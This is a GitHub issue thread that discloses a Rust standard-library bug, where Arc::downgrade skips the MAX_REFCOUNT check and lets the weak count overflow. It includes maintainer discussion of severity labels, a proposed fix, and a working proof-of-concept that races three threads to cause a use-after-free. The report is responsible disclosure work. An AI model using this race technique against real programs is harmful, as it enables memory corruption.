Closed noamtashma closed 1 year ago
I've opened a pull request here
@rustbot assign @noamtashma
I must stress that our 16-bit targets do not support "atomics" indeed, they barely support math on larger types, so the hypothetical ability to exploit this on them is not actually present.
(I changed the title because this issue is about an overflow - I don't think there's an underflow issue as well)
There was some discussion about whether I-unsound
should be added to this. I have personally declined to add I-unsound
because the last time I did so I started a huge debate as it was explained to me, while this does allow a use-after-free, this can only be done during the microseconds the program is being concurrently terminated. While we should still fix this, the broken invariants will be closed over by process death, one way or another. :crab: :hocho:
I wanted to add I-unsound, since I think an RCE during that time window can still be a serious vulnerability. (Or, I wonder if it might be possible that, after gaining control of a thread, a hacker could also gain control of the other thread and prevent the abort from actually happening?)
Especially since rust doesn't have much control over the system's abort
duration, or any detail for that matter.
IMO the main thing stopping this from being severe is that, to be vulnerable your code must leak a lot of values, without leaking actual heap space. Or that the attacker wouldn't be able to have a lot of close calls to Arc
functions in order to win the race.
But since being unsound means that "adversarial" safe code can be unsafe, I don't think that's a relevant reason not to tag this as unsoundness.
"adversarial" safe code can be unsafe,
From the security perspective, I just want to emphasize that "adversarial" should be considered non-literal -- source code is generally considered within the trust boundary, and if that's ever not the case then you need an entire sandboxing solution for both compilation and execution.
I do think it's accurate to classify this as an unsoundness bug, even though it's very low risk. Let's mark it as I-unsound with P-low for now.
I discovered a memory safety vulnerability in the standard library's
Arc
.Before the rest of the issue, I just want to say thanks in advance to everyone involved for helping to keep rust safe 🦀 :)
Description of the vulnerability:
In
Weak::clone
, the weak count is incremented usingfetch_add
, and then it's checked whether the result passedMAX_REFCOUNT
. As is documented inArc::clone
's code, this is because if the counter gets too close to overflowing, the overflow might happen before the call toabort
completes, breaking Arc's invariants and probably causing UB. Checking if the counter passedMAX_REFCOUNT
means that at least 2^15 (in 16-bit platforms) increments to the counter beforeabort
completes are needed for an overflow.However, in
Arc::downgrade
, the code increments the weak count, without checking that the counter doesn't passMAX_REFCOUNT
. This allows the counter to get all the way up tousize::MAX - 1
. Then, usingWeak::clone
, we can get a much more favorable race than intended.Therefore, the attack is as follows:
We use
Arc::downgrade
to increment the weak count all the way tousize::MAX - 1
, then runWeak::clone
three times in parallel. The first two will callabort
, but the third will result in a weak count of 1, indicating that there are no remainingWeak
s (while there actually are). Then we can abuse this broken invariant to cause UB, for example throughArc::get_mut
, as long as we manage to do so before either of the twoabort
calls complete.Demonstration of the vulnerability:
Note than to run this exploit yourself, if you're running a 64-bit architecture, the exploit won't run in a reasonable length of time. So
Arc
has to be modified to lower the counter to 32-bits, to demonstrate the vulnerability.The exploit in code
```rust type Counter = usize; fn exploit() { println!("Started!"); use std::boxed::Box; use std::sync::*; // use crate::sync::atomic::{AtomicBool, Ordering}; let arc = Arc::new(Box::new(7)); // Keep one of the weaks alive let weak = Arc::downgrade(&arc); // The weak count starts at `1`. // Increase to `Counter::MAX - 1`. for i in 0..Counter::MAX - 3 { std::mem::forget(Arc::downgrade(&arc)); if i % 100000000 == 0 { println!("{i} out of {}", Counter::MAX); } } let mutex_arc = std::sync::Mutex::new(Some(arc)); println!("Finished incrementing"); // let start = AtomicBool::new(false); // We run this function three times in parallel, to trigger our vulnerability. let evil = || { let id = std::thread::current().id(); // You can try this if some extra syncronization is wanted, to make all three threads // start at the approximately same time. I didn't end up needing it, so I don't know if it even helps. // loop { // if start.load(Ordering::Relaxed) { // break; // } // } let weak2 = weak.clone(); println!("{id:?}: Managed to clone!"); // Take the `Arc` let arc = mutex_arc.lock().unwrap().take(); let Some(mut arc) = arc else { println!("{id:?}: Error: Arc already taken!"); return; }; println!("{id:?}: Arc taken!"); // This will succeed even though we still have a `Weak` let Some(val) = Arc::get_mut(&mut arc) else { println!("{id:?}: Error: Failed to get unique access :("); return; // Didn't manage to exploit :( }; println!("{id:?}: Succeeded!"); let arc2 = weak2.upgrade().unwrap(); let also_val = &**arc2; // `val` and `also_val` point to the same value. println!("{id:?}: also_val: {also_val}"); **val = 9; println!("{id:?}: also_val: {also_val}"); *val = Box::new(5); // Now `also_val` points to freed memory println!("{id:?}: also_val: {also_val}"); }; std::thread::scope(|s| { let _ = s.spawn(evil); let _ = s.spawn(evil); let _ = s.spawn(evil); // let _ = s.spawn(|| { // start.store(true, Ordering::Relaxed); // }); }); println!("Done.\n\n\n"); } ```
Running on 64-bit architectures
This is how I tested the exploit myself. I modified the `std` so that the counter would only be a `u32`, and ran the exploit as a "test", with this command: ``` > ./x.py --stage 0 test library/alloc --test-args "exploit --nocapture" ``` This is also present [here](https://github.com/noamtashma/rust-arc-safety-bug/tree/Demo).
Fixing:
The fix is very simple. In the
Arc::downgrade
compare-exchange loop, add a check that ifcur > MAX_REFCOUNT
, and it's notusize::MAX
, panic. Add a comment explaining that not straying too much aboveMAX_REFCOUNT
is a global invariant, and must be enforced in all increment operations.Severity:
I'm not sure how severe it is, since it depends on a race with
abort
, and I don't know how to assess winning this race in real code on different platforms.It should also be noted that in order for this to be exploited, a large amount of
Weak
s need to be leaked (depending onusize
size), without also leaking heap memory (otherwise the program would run out of memory first).